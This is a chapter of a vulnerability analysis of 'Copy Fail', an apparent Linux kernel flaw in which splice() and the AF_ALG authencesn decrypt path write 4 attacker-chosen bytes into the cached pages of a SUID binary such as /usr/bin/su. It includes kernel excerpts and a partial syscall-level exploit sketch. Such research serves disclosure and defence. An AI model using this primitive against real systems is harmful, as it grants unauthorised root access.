4 Vulnerability Anatomy

4.1 Vulnerability Overview

At a high level, this bug lets an unprivileged user modify a few bytes of a root-owned executable "file", even though that file was only supposed to be read, not written.

The trick is that the write does not go through the normal filesystem write path at all. Instead, attacker makes the kernel treat file-backed pages as part of a crypto request, and then relies on a buggy decrypt path to write 4 controlled bytes past, which is the in-memory backing page cache later reused by execve().

So the bug is the opposite of copying, instead:

  • the target file page is first borrowed into a pipe by the zero-copy splice() path,
  • that page is then reused inside an AF_ALG AEAD decrypt request,
  • and the selected buggy authencesn() decrypt implementation writes 4 bytes into the wrong place.

If the chosen target is a SUID binary such as /usr/bin/su, corrupting its cached executable bytes is enough to turn a decrypt request into local privilege escalation. Even though that request may fail — but it does not matter.

4.2 Copy Fail Exploit Chain

After a deep dive through the Linux kernel, the exploit chain becomes easier to read. Each step below links back to the section where that mechanism was introduced.

  1. Pick a file-backed executable target whose bytes are served through the page cache. For privilege escalation, the target can be a root-owned SUID binary such as /usr/bin/su.
  2. Open an AF_ALG AEAD socket path for authencesn(hmac(sha256),cbc(aes)), so a later recvmsg() reaches the selected authencesn() decrypt path.
  3. Use sendmsg() to queue attacker-controlled AAD. Bytes 4..7 of that AAD become seqno_lo, the 4-byte value later written by crypto_authenc_esn_decrypt() during the "OOB" scatterlist walk.
  4. Use splice(file -> pipe) so the pipe holds a pipe_buffer referencing the target file's cached page, rather than a private copied buffer.
  5. Use the pipe -> socket splice path so that same pipe-backed page is forwarded through splice_to_socket(). Internally, the pipe buffer becomes a bio_vec, then a page-backed msg_iter marked with MSG_SPLICE_PAGES.
  6. On the accepted AF_ALG operation socket, af_alg_sendmsg() handles the MSG_SPLICE_PAGES payload and converts the page-backed iterator into the AEAD TX scatterlist. At this point, the target file's page-cache page has entered the crypto request path.
  7. Let _aead_recvmsg() build the decrypt request scatterlist: the valid RX output head is backed by the caller's receive buffer, while the preserved TX tag tail can still point at the spliced file-backed page.
  8. Trigger decrypt with recvmsg(). On the authencesn() decrypt path, the kernel performs the destination-side scratch write at assoclen + cryptlen.
  9. Because scatterwalk follows the chained scatterlist mechanically, that 4-byte write crosses the valid decrypt output boundary and lands in the next chained entry, which is backed by the target file's page-cache page.
  10. The decrypt operation fails authentication and returns an error, but the 4-byte overwrite remains in page cache. A later execve() of the target binary consumes the corrupted executable bytes.

Chained from the kernel perspective:

Exploit chain
════════════════════════════════════════════════════════════

1. choose target
   root-owned SUID executable
   e.g. /usr/bin/su


2. file page enters pipe
   splice(file -> pipe)
   pipe_buffer references cached file page


3. pipe page enters socket send path
   splice(pipe -> socket)
   pipe_buffer -> bio_vec -> msg_iter
   MSG_SPLICE_PAGES


4. page enters AF_ALG TX scatterlist
   af_alg_sendmsg()
   extract_iter_to_sg()


5. attacker-controlled AAD is queued
   AAD[4:8] = seqno_lo
   4-byte value to be written later


6. decrypt request is built
   _aead_recvmsg()
   RX output head + chained TX tag tail


7. authencesn decrypt runs
   crypto_authenc_esn_decrypt()


8. destination-side scratch write
   scatterwalk_map_and_copy(...,
                            dst,
                            assoclen + cryptlen,
                            4,
                            out = 1)


9. scatterwalk follows sg_next()
   valid RX output -> chained TX tag entry


10. page-cache overwrite
    4 attacker-controlled bytes land in cached file page


11. later execve()
    kernel executes corrupted cached executable bytes
Expand

In compact form:

SUID file page → splice(file -> pipe)pipe_buffer refs cached page → splice(pipe -> socket)msg_iter with MSG_SPLICE_PAGESAF_ALG TX scatterlist → TX tag tail chained after RX output → authencesn scratch write @ assoclen+cryptlen → scatterwalk follows sg_next() → 4-byte page-cache overwrite → later execve() runs corrupted cached executable bytes

4.3 Vulnerable Execution Path

This section closes the last gap left at the end of Chapter 3. We already proved the algorithm-side write in authencesn(); now we follow one target file page until it becomes the chained TX-side scatterlist entry that sits behind the decrypt boundary.

4.3.1 File-to-pipe Page Installation

The first half of the primitive comes from the regular-file splice() path:

splice()do_splice()splice_file_to_pipe()do_splice_read()filemap_splice_read()splice_folio_into_pipe()

The important effect is that splice_folio_into_pipe() creates a struct pipe_buffer that directly references the file-backed page-cache page:

C
*buf = (struct pipe_buffer) {
    .ops    = &page_cache_pipe_buf_ops,
    .page   = page,    // cached file page
    .offset = offset,  // target file offset on page
    .len    = part,
};

So after splice(file -> pipe), the pipe does not hold an anonymous copy of the file data. It holds a pipe-buffer entry pointing at the cached file page itself.

Plaintext
target file offset
    |
    v
cached file page in page cache (folio/page)
    |
    v
pipe buffer references that page

That gives the first half of the primitive:

Plaintext
target file offset -> cached file page -> pipe buffer reference

At this point, no corruption has happened yet. The only state we have is a file-backed page-cache page represented by a pipe buffer. The next question is how that pipe buffer reaches the AF_ALG request path.

4.3.2 Pipe Page Into TX Scatterlist

The pipe now references a cached file page. The exploit needs that same page reference to become crypto input, so the next step is splice(pipe -> AF_ALG socket).

That handoff happens when pipe data is spliced into the accepted AF_ALG operation socket. In splice_to_socket(), the kernel consumes pipe buffers and describes their backing pages as bio_vec entries, described in fs/splice.c:869-891:

C
struct pipe_buffer *buf = &pipe->bufs[tail & mask];  // pipe buffer
...

bvec_set_page(
    &bvec[bc++],
    buf->page,    // page referenced by pipe_buffer
    seg,          // length
    buf->offset   // offset inside that page
);

...

msg.msg_flags = MSG_SPLICE_PAGES;  // [!]

...

ret = sock_sendmsg(sock, &msg);

The important part is:

pipe_buffer page
        |
        v
bio_vec entry
        |
        v
socket sendmsg with MSG_SPLICE_PAGES

So the page is not copied into a normal userspace buffer. It is carried forward as a page-backed iterator into the socket send path.

For the accepted AF_ALG AEAD socket, sock_sendmsg() dispatches into aead_sendmsg(), which immediately forwards into af_alg_sendmsg():

sock_sendmsg()
        |
        v
aead_sendmsg()
        |
        v
af_alg_sendmsg()

Inside af_alg_sendmsg(), the exploit-relevant path is selected by MSG_SPLICE_PAGES, described af_alg.c:1040-1061:

C
static int af_alg_sendmsg(struct socket *sock,
                          struct msghdr *msg,  // sendmsg() message from user space 
                          size_t size,
                          unsigned int ivsize)
{
    ...


    // msg.msg_flags = MSG_SPLICE_PAGES
    if (msg->msg_flags & MSG_SPLICE_PAGES) {
        struct sg_table sgtable = {
            .sgl        = sg,        // TX scatterlist
            .nents      = sgl->cur,  // used entries
            .orig_nents = sgl->cur,
        };

        // [!] conversion
        plen = extract_iter_to_sg(   
            &msg->msg_iter,           // spliced/page-backed iterator
            len,
            &sgtable,                 // append into sg table
            MAX_SGL_ENTS - sgl->cur,
            0
        );

        ...

        for (; sgl->cur < sgtable.nents; sgl->cur++)
            get_page(sg_page(&sg[sgl->cur]));  // keep page alive
    ...

This is the conversion point:

pipe-backed iterator
        |
        v
extract_iter_to_sg()
        |
        v
AF_ALG TX scatterlist entry

So the full bridge is:

cached file page
        |
        v
pipe buffer references that page
        |
        v
splice_to_socket()
        |
        v
MSG_SPLICE_PAGES sendmsg
        |
        v
af_alg_sendmsg()
        |
        v
extract_iter_to_sg()
        |
        v
TX scatterlist entry

At this point, the target file page is no longer only sitting behind a pipe buffer. It has become part of the AEAD request's TX scatterlist. It is still only input, though; the write becomes possible only after _aead_recvmsg() builds the in-place decrypt layout.

file-backed page enters AEAD TX path
═══════════════════════════════════════════════

┌────────────────────────────┐
│ target file page cache     │
│ /usr/bin/su @ offset X     │
└──────────────┬─────────────┘
               │ splice(file -> pipe)

┌────────────────────────────┐
│ pipe buffer                │
│ references cached page     │
└──────────────┬─────────────┘
               │ splice(pipe -> AF_ALG socket)
               │ MSG_SPLICE_PAGES

┌────────────────────────────┐
│ AF_ALG TX scatterlist      │
│ sg entry references page   │
└────────────────────────────┘

4.3.3 Chained Decrypt Request Layout

Now the AF_ALG operation socket has both ingredients:

  • attacker-controlled AAD submitted through the normal sendmsg() path;
  • file-backed TX scatterlist entries imported through the MSG_SPLICE_PAGES path.

_aead_recvmsg() is where those two ingredients are combined. It converts the queued TX state and the caller's RX buffer into the final AEAD decrypt request.

On the decrypt path, the construction happens in three steps:

  1. copy output-sized prefix: from TX (AAD || ciphertext || tag) to RX (AAD || ciphertext)
  2. preserve the left-over TX tag tail tag
  3. chain preserved tag after RX head: RX head → TX tag tail

In code, the important operations are:

The final request shape is:

AEAD decrypt request
════════════════════════════════════════════════════

req->src  ──▶ RX head ───────────────▶ TX tag tail
         [ AAD || ciphertext ]           [tag]

req->dst  ──▶ RX head
         [ AAD || plaintext  ]  
                             ^
                           valid output ends here

The exploit-relevant detail is the TX tag tail:

  • preserved input tag region
  • chained after the RX output head
  • can still be backed by the spliced file page

This is the exact point where the file-backed page imported through the pipe becomes the next scatterlist entry after the valid decrypt output region. The page is now positioned behind the boundary; the remaining missing piece is a write that starts at that boundary.

4.3.4 Authencesn Scratch Write

The previous step leaves us with a decrypt request whose req->dst starts at the RX head, while the preserved TX tag tail is chained immediately after that valid output region. Nothing has been overwritten yet; _aead_recvmsg() has only constructed the shape.

The overwrite happens only when that prepared request is submitted to the selected AEAD implementation. In this path, crypto_aead_decrypt() dispatches the request into crypto_authenc_esn_decrypt(), the decrypt callback for authencesn(hmac(sha256),cbc(aes)).

The exploit-relevant lines are:

C
cryptlen -= authsize;

...

/*
 * Read the first 8 bytes from dst into tmp.
 *
 * In this request layout, dst starts at the RX head,
 * whose first bytes are the AAD.
 */
scatterwalk_map_and_copy(
    tmp,
    dst,
    0,
    8,
    0  // read flag: scatterlist -> tmp
);

/*
 * Write the lower 4 bytes back near the AAD area.
 */
scatterwalk_map_and_copy(
    tmp,
    dst,
    4,
    4,
    1  // write flag: tmp -> scatterlist
);

/*
 * Write the upper 4 bytes at the decrypt boundary.
 *
 * This is the Copy Fail write.
 */
scatterwalk_map_and_copy(
    tmp + 1,
    dst,
    assoclen + cryptlen,
    4,
    1  // write flag: tmp -> scatterlist
);
Expand

The first scatterwalk_map_and_copy() reads 8 bytes from the beginning of dst into tmp. Since req->dst starts at the RX head, and the RX head begins with the AAD, this captures:

tmp
┌────────────┬────────────┐
│ tmp[0]     │ tmp[1]     │
│ AAD[0:4]   │ AAD[4:8]   │
└────────────┴────────────┘

So the attacker-controlled bytes staged in AAD[4:8] become tmp + 1.

Then authencesn() uses that tmp + 1 pointer as the source of the second scratch write:

C
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);

That gives the value flow:

AAD[4:8]  ->   read into tmp[1] (tmp+1) ->  4-byte scratch write source

The offset side is separate. cryptlen is first reduced by the tag size:

cryptlen -= authsize;

So at the time of the write:

cryptlen = ciphertext length

and the destination offset becomes:

assoclen + cryptlen
= AAD length + ciphertext length
= end of valid decrypt output

Therefore the write operation is:

value  = AAD[4:8]
target = dst @ assoclen + cryptlen
size   = 4 bytes

Visually:

valid decrypt output
┌────────────┬────────────────────┐
│    AAD     │     plaintext      │
└────────────┴────────────────────┘
                                  ^

              AAD[4:8] is written here as 4 bytes

Because scatterwalk_map_and_copy() walks the destination scatterlist mechanically, the write does not stop just because the AEAD output boundary ends there. If the next scatterlist entry is chained after RX, sg_next() carries the write forward.

In this exploit path, that next entry is the preserved TX tag tail backed by the spliced file page. That completes the bridge from attacker-controlled AAD bytes to a page-cache-backed destination.

4.3.5 Page-cache Overwrite Primitive

Now the two halves meet. The previous step showed the write gadget:

C
scatterwalk_map_and_copy(
    tmp + 1,
    dst, 
    assoclen + cryptlen,  // scatterlist walk oob
    4, // bytes to write
    1  // write flag
);

From 4.3.4, the value comes from the AAD:

AAD[4:8] -> tmp + 1 -> 4-byte scratch write source

By itself, that is only a 4-byte destination-side scatterlist write. It becomes the Copy Fail primitive because of the request layout built earlier: dst starts at the RX output head, but the scatterlist does not stop there. After the valid decrypt output region, it continues into the preserved TX tag entry.

That preserved TX tag entry came from the spliced pipe path. Earlier, af_alg_sendmsg() imported the MSG_SPLICE_PAGES payload into the AEAD TX scatterlist, so the chained tag entry can still reference the target file's cached page.

Now the primitive is fully assembled:

  • WHAT to write:
    • AAD[4:8] / seqno_lo
  • HOW the write happens:
    • authencesn scratch write
    • scatterwalk_map_and_copy(..., dst, assoclen + cryptlen, 4, out = 1)
  • WHERE it lands:
    • chained TX tag entry
    • spliced file-backed page

So the write path is:

attacker input
──────────────
AAD[4:8] / seqno_lo


authencesn scratch write 
────────────────────────
scatterwalk_map_and_copy(tmp + 1,
                         dst,
                         assoclen + cryptlen,
                         4,
                         out = 1)


scatterlist crossing
────────────────────
dst output boundary


    sg_next()


preserved TX tag entry


file-backed page-cache page

This is the core Copy Fail primitive: a 4-byte attacker-controlled value is written through the AEAD destination scatterlist into a page-cache-backed entry.

The important point is that userspace never performs a normal write() to the target file. The file page is first imported through splice(), then carried into the AF_ALG TX scatterlist, and finally overwritten by the kernel-side authencesn scratch write.

To achieve write-what-where, we need to understand the syscall shape below which is the userspace way to arrange those kernel states.

4.3.6 Syscall-level Primitive

At the syscall level, the primitive is not a normal file write. Userspace only arranges two things:

  • the 4-byte value to write, staged through AAD[4:8]
  • the file-backed target page, staged through splice()

Then it triggers the kernel-side decrypt path.

A sketch for the exploit workflow:

C
/*
 * This is a syscall-level sketch, not a complete standalone exploit.
 * Key setup, authsize setup, IV/control messages, exact offsets, and
 * error handling are intentionally collapsed so primitive shape stays visible.
 */

/* 1. Open the AF_ALG AEAD transform. */
int tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);

struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type   = "aead",
    .salg_name   = "authencesn(hmac(sha256),cbc(aes))",
};

bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa));

/*
 * 2. Configure key/authsize, then accept the operation socket.
 *
 * setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, ...);
 * setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, ...);
 */
int op_fd = accept(tfm_fd, NULL, NULL);

/*
 * Victim target:
 *
 * The first splice selects the target file-backed page that we want
 * to carry into the pipe, and later into the AF_ALG TX scatterlist.
 */
char *victim = "/usr/bin/su";
int target_file_fd = open(victim, O_RDONLY);

off_t target_file_offset = 0x1234;  /* victim file/page selection offset */
size_t splice_len = 0x1000;         /* enough bytes for the planned TX layout */

int pipe_fds[2];
pipe(pipe_fds);

/*
 * 3. Queue attacker-controlled AAD.
 *
 * AAD[4:8] becomes seqno_lo.
 * authencesn later writes these 4 bytes through:
 *
 *     scatterwalk_map_and_copy(tmp + 1,
 *                              dst,
 *                              assoclen + cryptlen,
 *                              4,
 *                              1);
 */
uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
uint8_t aad[8];

memset(aad, 'A', 4);              /* AAD[0:4] */
memcpy(aad + 4, write_value, 4);  /* AAD[4:8] = seqno_lo */

struct iovec aad_iov = {
    .iov_base = aad,
    .iov_len  = sizeof(aad),
};

struct msghdr aad_msg = {
    .msg_iov        = &aad_iov,
    .msg_iovlen     = 1,
    .msg_control    = cmsg_buf,   /* ALG_SET_OP / ALG_SET_AEAD_ASSOCLEN / IV */
    .msg_controllen = cmsg_len,
};

/*
 * MSG_MORE keeps the AF_ALG request open so more input can be appended.
 */
sendmsg(op_fd, &aad_msg, MSG_MORE);

/*
 * 4. Splice the target file page into a pipe.
 *
 * Kernel-side effect:
 *
 *     target file page cache
 *         -> pipe_buffer
 */
splice(
    target_file_fd,
    &target_file_offset,
    pipe_fds[1],
    NULL,
    splice_len,
    0
);

/*
 * 5. Splice the pipe into the AF_ALG operation socket.
 *
 * Kernel-side effect:
 *
 *     pipe_buffer
 *         -> bio_vec
 *         -> msg_iter marked MSG_SPLICE_PAGES
 *         -> AF_ALG TX scatterlist
 */
splice(
    pipe_fds[0],
    NULL,
    op_fd,
    NULL,
    splice_len,
    0
);

/*
 * 6. Trigger decrypt.
 *
 * rx_buf is the normal caller-provided receive buffer.
 *
 * _aead_recvmsg() builds:
 *
 *     RX output head -> preserved TX tag tail
 *
 * Then authencesn performs the destination-side scratch write.
 */
recv(op_fd, rx_buf, rx_len, 0);
Expand

The exact offset choreography is handled later (see 5.2). For now, the important mapping is:

  • target_file_offset → selects file-backed page entering pipe
  • AF_ALG decrypt layout → positions that page inside the preserved TX tag tail
  • assoclen + cryptlen → makes the authencesn scratch write land at the RX/TX chain boundary

Read as one execution stream:

controlled AAD[4:8]

        │ sendmsg()

AF_ALG request input

        │ splice(file -> pipe)

pipe references target page-cache page

        │ splice(pipe -> AF_ALG socket)

AF_ALG TX scatterlist contains page-backed entry

        │ recv()

_aead_recvmsg() chains TX tag tail after RX output

        │ authencesn decrypt

AAD[4:8] written at dst @ assoclen + cryptlen

The decrypt may fail authentication, but that failure is not a rollback point. The scratch write has already happened.

4.3.7 Execution from Corrupted Cache

After the overwrite, the target file's page-cache page contains modified bytes. For an executable file, later execve() may consume those cached bytes as instruction data.

For a root-owned SUID target, that means:

4-byte page-cache overwrite


corrupted executable page


later execve()


modified code runs in SUID program context

At this point, the remaining exploit work is to place attacker-controlled patch bytes into the victim file's page-cache page.

In Chapter 7, we will finally turn this primitive into working exploit implementations across different languages — right after a quick PoC to understand how to construct an exploit (Chapter 5) with some runtime debugging evidence demonstration (Chapter 6).